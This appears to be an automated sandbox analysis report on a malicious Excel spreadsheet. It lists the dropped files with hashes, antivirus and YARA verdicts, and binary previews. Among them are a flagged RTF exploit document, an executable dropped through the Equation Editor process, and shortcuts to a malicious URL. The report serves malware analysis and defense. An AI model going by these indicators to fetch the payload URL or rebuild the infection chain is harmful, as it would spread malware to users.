                        SHA1:8C19872A02FAA2CFFC53414535B9FA33E639DE58
                        SHA-256:584EB121F00BB118B6E6E3E9E76CF9E6905701957A0FA671B1B90E97ADE5AEA9
                        SHA-512:36D581E65A3DBD470DFD868D09809AC175453B6F759663E90D61D38D38D45FDE3CC1572BDCE31E51D23A45438A0D4529295B5C6BCFD6416D971A0A5E662E4DA7
                        Malicious:false
                        Reputation:low
                        Preview:....l...........Q...r...........QN...a.. EMF.....0.f...'...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\37D00239.emf

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                        Category:dropped
                        Size (bytes):3345824
                        Entropy (8bit):4.127125964869289
                        Encrypted:false
                        SSDEEP:12288:31SyEH5O3VGnjujIwQusOwvBWXKcnXfxpjZarUkeaNYHAo1KWwy1wAD8dt3iGnjs:3Iy6O3owCKCG15wy+Aat3wwKuWh1Owz
                        MD5:58E652C4B5EC5C5E39FD35E4173028E2
                        SHA1:527EAA579DABD37C966DE4E6774CFE6525C5639D
                        SHA-256:1A1BA95C0916EE7B8F6E82DC43A615CBF888B7A01BD74626E7F5B38AF3C50FCA
                        SHA-512:A1CF5189F885B5F50EC164C2A8F511379B49AD8229C042D7515745407CD72E69480895E3208E897B8EF56D732EED067A68197BAA953F12288F6CF08DC36A1FF3
                        Malicious:false
                        Preview:....l...........Q...............!?..3X.. EMF......3.....5...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'................3f.....%....................3f.....................................L...d...4...f...7...{...4...f...........!..............?...........?................................'.......................%...........(.......................L...d...............................$...!..............?...........?................................'...

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67B638E7.emf

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                        Category:dropped
                        Size (bytes):47668
                        Entropy (8bit):3.1599469381569234
                        Encrypted:false
                        SSDEEP:384:CU3D+b3D5w5Md8+8HigjlyI2bvIM6kbvBnMVGGSvUAEgGNTpy:CU36KMiBHiQIb5r6VGdMAL5
                        MD5:298125198253060104C29A7B3653FE58
                        SHA1:D6F786539EF606048BB92BCD2CAE3563A9A55710
                        SHA-256:BF40FFEC5DE817E2594A8118161886C3EF96708E2CCA7216D0EF0C4DB594A258
                        SHA-512:59AF7EF875FDEDB6C50012EE9E54349E0098D66CE2C7943EADD0F35FD2A6D50827E73A5BC1EC028F411C32938AC6A5B6A1EF4B04A2AF672E3B5D7327FC25F001
                        Malicious:false
                        Preview:....l...........;...............~@..xW.. EMF....4...u.......................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................<.......%...........%.......................R...p................................@..T.i.m.e.s. .N.e.w. .R.o.m.a.n.........................................................................P...................x....................... .......x.......x...............G................*..Ax...N..............T.i.m.e.s. .N.e.w. .R.o...F.....6...................................................................dv......%...........%...........%.......................T...T...........+...q........i.@...@....Z.......L...............<.......P... ...,...............T...T...,.......W...q........i.@...@,...Z.......L...............<.......P... ...,...............T...T...X...........q........i.@...@X...Z.......L...............<...

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D7BEDBC.emf

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                        Category:dropped
                        Size (bytes):3360728
                        Entropy (8bit):4.12718670281121
                        Encrypted:false
                        SSDEEP:12288:E1/uhO5r34GnjpjIwIustwvuWXKcnXfxpCZa+Uk3aNxHJo1dWw31oXD8dt3iGnjQ:E9u2r3gwaamn1cw3CXat3wwKuWh1Owv
                        MD5:644701F1DA7442BC9C139034FBB591D3
                        SHA1:0D22B3A4ED0609FD590033FFC59A5DAEAF1AFEEE
                        SHA-256:5AD9F90A59546482A1CD47C92FEA98C88F7B9252B2E6CE0D94D724EE4B8C1062
                        SHA-512:FAA6E5B167C5D4B4D84DC6809F34601CE3873E2D2B8EE870F0065E6B10BEB376EF6FDE2D07C488DFB928F214409B457FD7E27736E69D8CCAD8E19DDF6A7B2788
                        Malicious:false
                        Preview:....l...........{................D...`.. EMF.....G3.....5.......................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................#..."...........!...................................................#..."...........!...................................................#..."...........!...................................................#...'................3f.....%....................3f.....................................L...d.......R.......c.......R...........!..............?...........?................................'.......................%...........(.......................L...d...................................!..............?...........?................................'...

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFE27256.doc

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:Rich Text Format data, version 1
                        Category:dropped
                        Size (bytes):84055
                        Entropy (8bit):2.564253730925419
                        Encrypted:false
                        SSDEEP:384:kwiGEC30k0fWHuaN6oQeO3seC31xcxwV+k629/sYdhpfsl4ZnxP941:N1WWPNxssN31xcxc+kRsYdkl4Znr0
                        MD5:0A9C028203A8416BE8DB7371550D0FB5
                        SHA1:2F576CDFBF4F60918676F6583265C504BDEEFA21
                        SHA-256:A424C4312F97747EFA22A627AA0C77C4F11022D171E11D3EEFF00DD77B737520
                        SHA-512:51D92688ABEE365F550552C565EBC422000C6CDF6A0E58528922BDE4323906CD85D3DCF7D29FB52ADF9CDC4C59E3310704A25657B5A9683ED041087F7DB01B69
                        Malicious:true
                        Yara Hits:
                        • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFE27256.doc, Author: ditekSHen
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        Preview:{\rtf1.............{\*\groupTop920443172 \(}.{\664116854/<`?2:.~57$-|-+],|2/?5$,;^?+!.8/.~]%...6^3/;8.4#[..?>):5@2=?0??97(+.6.#+`'5:);*(5??@7.;6?&4%:25[756?1?^].&[&&&+*>7-%1?8?%6$*!;|#?_20=/!~+'%?:?%[4']?/,|?`8(?_#/)1|>9%-```6.64;073*%%,$?3%</''@/_9'.?.4`_,#1$`>5#*?6<~<'?=;&%0&#?/.?*$?.&..7]#?.?~?%,?#8/'&):?.4$?77*4*^70?6?-..)^_`?9=:%`..|$+?]'0~]._1,;!.7.~??29`;:?<?_[^?5*@_0_6*,?>;.-?>10@|@*=*?!>,]`2,':**[3#7]?8>2$~@.1?,-%?7'.<&@+)|-'*!4!2&?72&=5]#/?`_|&,-)$@9_2$,&+)7`2>/.%<?#+&_`:3^/'1=2%-'7`%5%..99?6+%`+0.?>1$%8_%?%0[)()!.<%*?%&~-#.9??:&!-5~2#10]|?7('?~^[6.-'`$)=`%?97(9<5;-6?@~?.0[.00`%3+#4`8...48,>-?_.@.%>7[!~7?)86,)@*&/?7`!..-$%;21.>2&<-.%[5-/|&+:7@2!4+~`.[?=@'=+.(?,1/&!|.>1.&,5.'&|4:*3.|7.~+,,=*~@.[.36%/!.&(#&`..?8-1?*(_)_,8#]'=..!?_%?%?,9.4***?4[-5$$?6==,=''1~%*~.,25~;.=7`[<*].87/.?.;89[>.).|;?8^??5:^:0^*]07?9??*/+?<@6727:?_!>+?`-8%?'':)8`>-.-#7(/3)]??%@6%68<~)16!|:%|^?>4=4:[..;_?@'^>`#..1$?%/3^;.=`^.$><?^..]:+./7/7.<26$5=??*~19-|6|$?5/!(58,`?.6:)1_5)[|?/'-0::8?.9'52(:%~22+4))&3*

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{0F8425F3-6468-4181-A134-C6330FCC02D5}.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:Composite Document File V2 Document, Cannot read section info
                        Category:dropped
                        Size (bytes):15872
                        Entropy (8bit):5.72399125716248
                        Encrypted:false
                        SSDEEP:384:HPp3BLjaiNLaJP43BLUKiNLaCP43BLUaiNLaCPg3BLUaiNLaCP43MLUaiNLa:HLZ2+Lq2VLO2dLO2oLO2
                        MD5:83465B4D507F374481966E3422BB77C7
                        SHA1:B3BE0FC4DF2F33E9C86F3B98561BB5CCF693332A
                        SHA-256:FA0C6F12D1BF03B64B7F2C1139DC647AA59D6C9CB8A9F399B2CD03D86340B993
                        SHA-512:FA38BC4E36BE4A284E4E272078709366FB0F28C370089C585D9A3BEAC133AC4F4D3BC6953B7C9668CAC6F404A4054C329948A88807A29721C5251F54B57CEA6C
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B15213CD-E12C-4146-96D0-2C2556B316CF}.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):8704
                        Entropy (8bit):3.554141900231258
                        Encrypted:false
                        SSDEEP:192:QivRy8FTydoCB1GiavHhLKcgeUXWZpBIJzeDkkWSP4HZnq7q:D4cSd1DyHhrgL2PIJzakkF4HJIq
                        MD5:8C7812D389C8AABFF1695D5AFAAE772D
                        SHA1:F2EF09689E3B7A7FFF3CE5955434A306C876F4BA
                        SHA-256:4E5AA4A9B20BC9B57C3A63DEDA4DDB23A3D411182DEBE6382735FABBC48FFC93
                        SHA-512:8002DBFE35247111BCBFF9CD65810E52D92ED11C05C431D1570FEEDC1473BCDB99330ED0BE0C08CD2B2B5D46F608029310BF5077B8B5783B7A884AF3AED88F6F
                        Malicious:false
                        Preview:..................6.4.1.1.6.8.5.4./.<.`.?.2.:...~.5.7.$.-.|.-.+.].,.|.2./.?.5.$.,.;.^.?.+.!...8./...~.].%.......6.^.3./.;.8...4.#.[.....?.>.).:.5.@.2.=.?.0.?.?.9.7.(.+...6...#.+.`.'.5.:.).;.*.(.5.?.?.@.7...;.6.?.&.4.%.:.2.5.[.7.5.6.?.1.?.^.]...&.[.&.&.&.+.*.>.7.-.%.1.?.8.?.%.6.$.*.!.;.|.#.?._.2.0.=./.!.~.+.'.%.?.:.?.%.[.4.'.].?./.,.|.?.`.8.(.?._.#./.).1.|.>.9.%.-.`.`.`.6...6.4.;.0.7.3.*.%.%.,.$.?.3.%.<./.'.'.@./._.9.'...?...4.`._.,.#.1.$.`.>.5.#.*.?.6.<.~.<.'.?.=.;.&.%.0.&.#.?./...?.*.$.?...&.....7.].#.?...?.~.?.%.,.?.#.8./.'.&.).:.?...4.$.?.7.7.*.4.*.^.7.0.?.6.?.-.....).^._.`.?.9.=.:.%.`.....|.$.+.?.].'.0.~.]..._.1.,.;.!...7...~.?.?.2.9.`.;.:.?.<.?._.[.^.?.5.*.@._.0._.6.*.,.?.>.;...-.?.>.1.0.@.|.@.*.=.*.?.!.>.,.].`.2.,.'.:.*.*.[.3.#.7.].?.8.>.2.$.~.@...1.?.,.-.%.?.7.'...<.&.@.+.).|.-.'.*.!.4.!.2.&.?.7.2.&.=.5.].#./.?.`._.|.&.,.-.).$.@.9._.2.$.,.&.+.).7.`.2.>./...%.<.?.#.+.&._.`.:.3.^./.'.1.=.2.%.-.'.7.`.%.5.%.....9.9.?.6.+.%.`.+.0...?.>.1.$.%.8._.%.?.%.0.[.).(.).!...<.%.*.?.%.&.~.-.#.

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C0EAEB1F-931C-4748-928E-79AFA452692F}.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):1024
                        Entropy (8bit):0.05390218305374581
                        Encrypted:false
                        SSDEEP:3:ol3lYdn:4Wn
                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                        Malicious:false
                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\{9A00E6F1-86EC-41E5-89D0-51DBC3A74098}

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):131072
                        Entropy (8bit):0.025622775596003594
                        Encrypted:false
                        SSDEEP:6:I3DPcvvHvxggLRRylergtL24pRXv//4tfnRujlw//+GtluJ/eRuj:I3DPoPFravYg3J/
                        MD5:698BBCA2DB04511F83DCF24831F9806C
                        SHA1:EBF80C31EE49812A30D6B0EFB14A5AD2D95A2669
                        SHA-256:1325CAC1E83D907D5DBC99B451C4A3E11A166913AFD7860A84A7CE6F7AD33940
                        SHA-512:07A907AF4E44010B6BB189F8B3A180AD8529F05C7B793F0205E1C88DB2EDC1C665F2F1F9D390B07D1C5B0E753111BAB9200E4FEA58B644ACF6B40E1171914700
                        Malicious:false
                        Preview:......M.eFy...z.n..gs.H...g;...S,...X.F...Fa.q............................F/L..\sN..<d.J.Y........1...G.IH...e.Lo......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\{F1514F80-452D-4818-AD6A-D4D4E378D94E}

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):131072
                        Entropy (8bit):0.025681029624502433
                        Encrypted:false
                        SSDEEP:6:I3DPcnWu5vxggLRVTlXGteQPRXv//4tfnRujlw//+GtluJ/eRuj:I3DPErN1YZvYg3J/
                        MD5:C63B0DEADB2FCE20F72E7E2773D20D82
                        SHA1:841ED8A16C032451B4A1A8B6EE334CEB7B0C3E87
                        SHA-256:9D783C5AD31E46AE6B07577670070ABF6AD4260937D8BE74C0D26E376B0E8CDC
                        SHA-512:CC69734ABF3DD2FA1BE1254E3DCDD03577AF9D695ECB3769CF2F6ADAAF9BB149E7A004742830EB7376E755C43FA80D2003C2ED12E15D8B31C658B86E2FC07C87
                        Malicious:false
                        Preview:......M.eFy...z-..s..N..%&..;"S,...X.F...Fa.q............................B.^.T.N.r..TMD..........7...IA...~........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\~DF21155FBE3CE5852B.TMP

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):512
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3::
                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                        Malicious:false
                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\~DF6D5A74146301A5A1.TMP

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Composite Document File V2 Document, Cannot read section info
                        Category:dropped
                        Size (bytes):568320
                        Entropy (8bit):7.9292978374813865
                        Encrypted:false
                        SSDEEP:12288:tlQfeWxJ3P++kns9xbEHQs57JDxmIHjvW4pM:EZwsLEh7JvrW42
                        MD5:D75C6B647F1C12135E96F43BAAAE48E8
                        SHA1:05F1E814FA8047BF897867F6665AB058DBAF4584
                        SHA-256:4E52AECC1650D7D0A5B768F5846E01E13527B67731466FE9DAE18297537A1422
                        SHA-512:AB4FBE79514F9299522524AB5F7812AB4533EDC3EE3A12FB39597EF62B9876C02C86624209B7E9386B624F738EAF73BCF938C1775161A9EAEC35D742B36A9E08
                        Malicious:false
                        Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                        C:\Users\user\AppData\Local\Temp\~DFA2DBDD95D657A82C.TMP

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):577536
                        Entropy (8bit):7.863144756722607
                        Encrypted:false
                        SSDEEP:12288:wlQfeWxJ3P++kns9xbEHQs57JDxmIHjvW4pM:1ZwsLEh7JvrW42
                        MD5:ED8FC1E1469089568EECF06C4B0F1DB1
                        SHA1:040DC17E1E45B16729EF8D5617C94FAFCEFA3B8B
                        SHA-256:40BE1F8379C817A1A8780370DB0256B2170CD8FAE7348ADEBB5339BD308C34F6
                        SHA-512:A661ED3B25AF90DB95AA821AA9A461D8A3CDB24ADC8261FAAE05281B8B684BD4C0FEE649A004A9677555495889E51678D49A2FEBEB59DAE3F119B1BBA5838561
                        Malicious:false
                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\~DFB64B45DE51BBE07D.TMP

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):512
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3::
                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                        Malicious:false
                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\dGa.url

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:MS Windows 95 Internet shortcut text (URL=<http://tny.wtf/dGa>), ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):44
                        Entropy (8bit):4.470573095811685
                        Encrypted:false
                        SSDEEP:3:HRAbABGQYm/3LcmWdovn:HRYFVm/3LOdyn
                        MD5:0FFF39E1FDCD78B0E6A988670CBFAB2C
                        SHA1:9206238017EA564C8332D48A4AEA14F555ACA73E
                        SHA-256:6EAEA2BF73B0E93543F442CA1AC65D1621D96E770DCC89C22089CCFCBD6E02D8
                        SHA-512:A3C6116FA93D2F340500180FFE065254F9CCFB5A87E24715C37F301451C7749C550C52FE9FBEFC29EFCEA722B7EE3920D3578A4D3705CC6C5AB57D24BB998C91
                        Malicious:true
                        Preview:[InternetShortcut]..URL=http://tny.wtf/dGa..

                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:Generic INItialization configuration [xls]
                        Category:modified
                        Size (bytes):88
                        Entropy (8bit):4.9664307324412285
                        Encrypted:false
                        SSDEEP:3:bDc7SIcLOQBGK5mM7/BGK5v:bQOhDBGazBGS
                        MD5:963168A7D6EE229C565540108AD3D53A
                        SHA1:689D839FE5A0A91D76721FAD78A1A2AD329F14C7
                        SHA-256:6434A3C4C2BB4ED907E267695CE40752FF7C0BA161D698735AD9418426C429AA
                        SHA-512:5A11866EAB7F507EDABD9EB53874805058F5E5462F195B05D914D042A04CEE1B12BDDE0A6278FBE04E4F0BF6D0319805DD13710ACC4AFCF2ACCAF5D01CFA14D6
                        Malicious:false
                        Preview:[folders]..dGa.url=0..tny.wtf.url=0..RFQ#51281AOLAI.LNK=0..[xls]..RFQ#51281AOLAI.LNK=0..

                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\tny.wtf.url

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:MS Windows 95 Internet shortcut text (URL=<http://tny.wtf/>), ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):41
                        Entropy (8bit):4.2963379801223045
                        Encrypted:false
                        SSDEEP:3:HRAbABGQYm/3LcmWy:HRYFVm/3LOy
                        MD5:D591A53347F94FBC48B4B6A5CCE920ED
                        SHA1:C00082566F3211F9B1BBEC933A8AE164759C290A
                        SHA-256:1CA93696A94797C9411318830CAC6A5B26FEACC37D5CAA4B3742D722CD073781
                        SHA-512:BA14258049ABCC3E31AA3DFC3ABBC2949AF30BB73B031C0E408BCF036B51B7AC11E32C3B39A7952E1A007179720C970B29CB2DF8EF03A021EF3B59FEB5AE177E
                        Malicious:true
                        Preview:[InternetShortcut]..URL=http://tny.wtf/..

                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):162
                        Entropy (8bit):2.503835550707525
                        Encrypted:false
                        SSDEEP:3:vrJlaCkWtVypil69oycWjUbtFJlln:vdsCkWtTl69oyjUvl
                        MD5:CB3D0F9D3F7204AF5670A294AB575B37
                        SHA1:5E792DFBAD5EDA9305FCF8F671F385130BB967D8
                        SHA-256:45968B9F50A9B4183FBF4987A106AB52EB3EF3279B2118F9AB01BA837DC3968A
                        SHA-512:BD116CAF3ACA40A5B90168A022C84923DB51630FA0E62E46020B71B8EB9613EAE776D476B0C6DE0D5F15642A74ED857765150F406937FBA5CB995E9FCDAC81AE
                        Malicious:false
                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                        C:\Users\user\AppData\Roaming\winiti.exe

                        Download File
                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):951296
                        Entropy (8bit):7.752827643333699
                        Encrypted:false
                        SSDEEP:24576:yXRv6h6aYfy8hbsv4IFlwLa15cAJAiV8KObLDCmCeBaOmXi:4JpTw8kJH8hCmvAOGi
                        MD5:1F5C95D40C06C01300F0A6592945A72D
                        SHA1:79A217ED19833EFCF640FFD8BB04803E9F30D6F4
                        SHA-256:434EC59B680788BAE7F2935200A77E681CECBB517D853C6E6CF31F4CF112E5CC
                        SHA-512:3CD70090E071E43B22A3638D8CDF13874C5DA34AFF2CB314E170FEDA59D630594314F45708797D83A47ED645A7F07755AC10F4A438858E6673CE560FE5F57975
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Joe Sandbox View:
                        • Filename: RFQ#51281AOLAI.xls, Detection: malicious, Browse
                        • Filename: RFQ#51281AOLAI.xls, Detection: malicious, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.f..............0..x............... ........@.. ....................................@....................................O...................................(m..T............................................ ............... ..H............text...$v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H...........LU......I...PZ.................................................}.....r...p}......}.....(.......(.....*...}.....r...p}......}.....(.......(.......}....*..0..............r...ps......o.....r...p...s.....s......s.........o....&..o.....o....}.....{.....{....o.............o....( ...&.......o!......*.........._b.. .......tw.......0............{....r...po".....{....r...po".....{....r...po".....{.....{.....%.o#.....o#.....{....r...po".....{....r...po".....{....r...po".....

                        C:\Users\user\Desktop\07330000

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 12:40:48 2024, Security: 1
                        Category:dropped
                        Size (bytes):1140736
                        Entropy (8bit):7.98235367076931
                        Encrypted:false
                        SSDEEP:24576:uZwsLEh7JvrW42q8CMFULmJ9k2g24yNtLawV94O0l6:uysK7VW42qhMFo8k2g9yn3VG3l
                        MD5:5990AD634A53B201A8F7DE801DA1C8C5
                        SHA1:03F0BECFD45D14886CBE1DBD13169CEB0BCAA35E
                        SHA-256:A3AFF8FC52BF437083E9DED89A855456707E31D73365F4728301606CB878A8E4
                        SHA-512:61A44310BF443852BECA6083888247E2493466FF1159BBA163E5F6B1C5FE6E39D71B3B2E1B24A3275727DE790B4FEFAFF28BF9FE454A6A8107E1D8C2174A27A6
                        Malicious:false
                        Preview:......................>...................................D...................................................f.......h.......j.......l.......n........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                        C:\Users\user\Desktop\07330000:Zone.Identifier

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:false
                        Preview:[ZoneTransfer]....ZoneId=0

                        C:\Users\user\Desktop\RFQ#51281AOLAI.xls (copy)

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 12:40:48 2024, Security: 1
                        Category:dropped
                        Size (bytes):1140736
                        Entropy (8bit):7.98235367076931
                        Encrypted:false
                        SSDEEP:24576:uZwsLEh7JvrW42q8CMFULmJ9k2g24yNtLawV94O0l6:uysK7VW42qhMFo8k2g9yn3VG3l
                        MD5:5990AD634A53B201A8F7DE801DA1C8C5
                        SHA1:03F0BECFD45D14886CBE1DBD13169CEB0BCAA35E
                        SHA-256:A3AFF8FC52BF437083E9DED89A855456707E31D73365F4728301606CB878A8E4
                        SHA-512:61A44310BF443852BECA6083888247E2493466FF1159BBA163E5F6B1C5FE6E39D71B3B2E1B24A3275727DE790B4FEFAFF28BF9FE454A6A8107E1D8C2174A27A6
                        Malicious:true
                        Preview:......................>...................................D...................................................f.......h.......j.......l.......n........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                        Static File Info

                        General

                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 02:51:49 2024, Security: 1
                        Entropy (8bit):7.978643526248791
                        TrID:
                        • Microsoft Excel sheet (30009/1) 47.99%
                        • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                        • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                        File name:RFQ#51281AOLAI.xls
                        File size:1'155'083 bytes
                        MD5:cdf0aba5b4f9e4315f9dfbf906a5c4da
